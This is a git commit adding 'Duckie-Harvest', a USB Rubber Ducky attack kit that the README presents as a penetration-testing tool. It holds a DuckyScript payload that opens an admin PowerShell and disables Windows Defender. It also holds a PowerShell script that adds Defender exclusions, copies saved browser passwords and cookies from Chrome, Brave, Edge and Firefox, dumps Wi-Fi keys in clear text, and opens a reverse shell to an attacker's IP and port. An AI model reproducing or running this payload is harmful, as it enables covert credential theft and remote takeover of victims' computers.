commit
3b30121b9e
|
@ -0,0 +1,41 @@
|
|||
# Duckie-Harvest
|
||||
## Overview
|
||||
|
||||
This script is designed for penetration testing purposes and offers the following functionalities:
|
||||
|
||||
- **Dump Wi-Fi Passwords**: Extracts and saves all Wi-Fi passwords stored on the target machine.
|
||||
- **Dump Browser Credentials**: Extracts saved credentials from Google Chrome, Brave, Firefox, and Microsoft Edge.
|
||||
- **System Information**: Collects and dumps comprehensive system information, including network configurations and active processes.
|
||||
- **Network Configuration**: Gathers detailed network configuration data and performs a network scan.
|
||||
- **Reverse Shell**: Initiates a reverse shell to provide remote command-line access (requires configuration of the attacker IP and attacker port).
|
||||
|
||||
This payload is intended for use with a USB Rubber Ducky device.
|
||||
|
||||
## Usage
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- **USB Rubber Ducky**: Ensure you have a USB Rubber Ducky device.
|
||||
- **Powershell**: The target machine must have Powershell installed.
|
||||
|
||||
### Configuration
|
||||
|
||||
1. **Configure drive name**:
|
||||
edit the powershell script to set the name of your drive
|
||||
|
||||
```powershell
|
||||
$DRIVE = 'DUCKY'
|
||||
2. **Configure Attacker IP and Port**:
|
||||
Edit the powershell script to set your attacker's IP address and port for the reverse shell connection:
|
||||
|
||||
```powershell
|
||||
$IP = 'YOUR_IP'
|
||||
$PORT = 'YOUR_PORT'
|
||||
|
||||
3. **Configure drive and powershell script name **:
|
||||
edit the payload.txt to set both the name of the drive label and the powershell script
|
||||
|
||||
```Duckyscript
|
||||
DEFINE #DUCKY_DRIVER_LABEL DUCKY
|
||||
DEFINE #PS1 sy_cred.ps1
|
||||
|
|
@ -0,0 +1,72 @@
|
|||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DUCKY_DRIVER_LABEL DUCKY
|
||||
DEFINE #PS1 sy_cred.ps1
|
||||
|
||||
IF ($_OS == WINDOWS )THEN
|
||||
|
||||
DELAY 200
|
||||
REM -----open Powershell as Admin
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 400
|
||||
LEFT
|
||||
DELAY 150
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRINGLN_POWERSHELL
|
||||
|
||||
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
|
||||
exit
|
||||
|
||||
END_STRINGLN
|
||||
|
||||
|
||||
|
||||
END_IF
|
|
@ -0,0 +1,140 @@
|
|||
|
||||
|
||||
#-- Payload configuration --#
|
||||
|
||||
$DRIVE = 'DUCKY' # Drive letter of the USB Rubber Ducky
|
||||
$IP = 'YOUR_IP' # IP address of the attacker machine
|
||||
$PORT = 'YOUR_PORT' # Port to use for the reverse shell
|
||||
|
||||
|
||||
# Set destination directory
|
||||
|
||||
|
||||
|
||||
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq $DRIVE }).DeviceID
|
||||
Set-Location $duckletter
|
||||
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
Add-MpPreference -ExclusionPath "${duckletter}\"
|
||||
Set-MpPreference -ExclusionExtension "ps1"
|
||||
|
||||
$destDir = "$duckletter\$env:USERNAME"
|
||||
if (-Not (Test-Path $destDir)) {
|
||||
New-Item -ItemType Directory -Path $destDir
|
||||
}
|
||||
|
||||
# Function to copy browser files
|
||||
function CopyBrowserFiles($browserName, $browserDir, $filesToCopy) {
|
||||
$browserDestDir = Join-Path -Path $destDir -ChildPath $browserName
|
||||
if (-Not (Test-Path $browserDestDir)) {
|
||||
New-Item -ItemType Directory -Path $browserDestDir
|
||||
}
|
||||
|
||||
foreach ($file in $filesToCopy) {
|
||||
$source = Join-Path -Path $browserDir -ChildPath $file
|
||||
if (Test-Path $source) {
|
||||
Copy-Item -Path $source -Destination $browserDestDir
|
||||
Write-Host "$browserName - File copiato: $file"
|
||||
} else {
|
||||
Write-Host "$browserName - File non trovato: $file"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Configuration for Google Chrome
|
||||
$chromeDir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
|
||||
$chromeFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Chrome" $chromeDir $chromeFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Chrome") -ErrorAction SilentlyContinue
|
||||
|
||||
# Configuration for Brave
|
||||
$braveDir = "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default"
|
||||
$braveFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Brave" $braveDir $braveFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Brave") -ErrorAction SilentlyContinue
|
||||
|
||||
# Configuration for Firefox
|
||||
$firefoxProfileDir = Join-Path -Path $env:APPDATA -ChildPath "Mozilla\Firefox\Profiles"
|
||||
$firefoxProfile = Get-ChildItem -Path $firefoxProfileDir -Filter "*.default-release" | Select-Object -First 1
|
||||
if ($firefoxProfile) {
|
||||
$firefoxDir = $firefoxProfile.FullName
|
||||
$firefoxFilesToCopy = @("logins.json", "key4.db", "cookies.sqlite", "webappsstore.sqlite", "places.sqlite")
|
||||
CopyBrowserFiles "Firefox" $firefoxDir $firefoxFilesToCopy
|
||||
} else {
|
||||
Write-Host "Firefox - Nessun profilo trovato."
|
||||
}
|
||||
|
||||
# Configuration for Microsoft Edge
|
||||
$edgeDir = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
|
||||
$edgeFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Edge" $edgeDir $edgeFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Edge") -ErrorAction SilentlyContinue
|
||||
|
||||
# Gather additional system information
|
||||
function GatherSystemInfo {
|
||||
$sysInfoDir = "$duckletter\$env:USERNAME\SystemInfo"
|
||||
if (-Not (Test-Path $sysInfoDir)) {
|
||||
New-Item -ItemType Directory -Path $sysInfoDir
|
||||
}
|
||||
|
||||
Get-ComputerInfo | Out-File -FilePath "$sysInfoDir\computer_info.txt"
|
||||
Get-Process | Out-File -FilePath "$sysInfoDir\process_list.txt"
|
||||
Get-Service | Out-File -FilePath "$sysInfoDir\service_list.txt"
|
||||
Get-NetIPAddress | Out-File -FilePath "$sysInfoDir\network_config.txt"
|
||||
}
|
||||
|
||||
GatherSystemInfo
|
||||
|
||||
# Network scanning
|
||||
|
||||
|
||||
# Retrieve Wi-Fi passwords
|
||||
function GetWifiPasswords {
|
||||
$wifiProfiles = netsh wlan show profiles | Select-String "\s:\s(.*)$" | ForEach-Object { $_.Matches[0].Groups[1].Value }
|
||||
|
||||
$results = @()
|
||||
|
||||
foreach ($profile in $wifiProfiles) {
|
||||
$profileDetails = netsh wlan show profile name="$profile" key=clear
|
||||
$keyContent = ($profileDetails | Select-String "Key Content\s+:\s+(.*)$").Matches.Groups[1].Value
|
||||
$results += [PSCustomObject]@{
|
||||
ProfileName = $profile
|
||||
KeyContent = $keyContent
|
||||
}
|
||||
}
|
||||
|
||||
$results | Format-Table -AutoSize
|
||||
|
||||
# Save results to a file
|
||||
$results | Out-File -FilePath "$duckletter\$env:USERNAME\WiFi_Details.txt"
|
||||
}
|
||||
|
||||
GetWifiPasswords
|
||||
|
||||
# Reverse shell
|
||||
function ReverseShell {
|
||||
param(
|
||||
[string]$ip,
|
||||
[int]$port
|
||||
)
|
||||
|
||||
$client = New-Object System.Net.Sockets.TCPClient($ip, $port)
|
||||
$stream = $client.GetStream()
|
||||
[byte[]]$bytes = 0..65535 | ForEach-Object {0}
|
||||
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
|
||||
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
|
||||
$sendback = (Invoke-Expression $data 2>&1 | Out-String)
|
||||
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
|
||||
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
|
||||
$stream.Write($sendbyte, 0, $sendbyte.Length)
|
||||
$stream.Flush()
|
||||
}
|
||||
$client.Close()
|
||||
}
|
||||
|
||||
ReverseShell -ip $IP -port $PORT
|
||||
|
||||
# Re-enable Windows Defender real-time monitoring
|
||||
Set-MpPreference -DisableRealtimeMonitoring $false
|
||||
|
||||
exit
|
Loading…
Reference in New Issue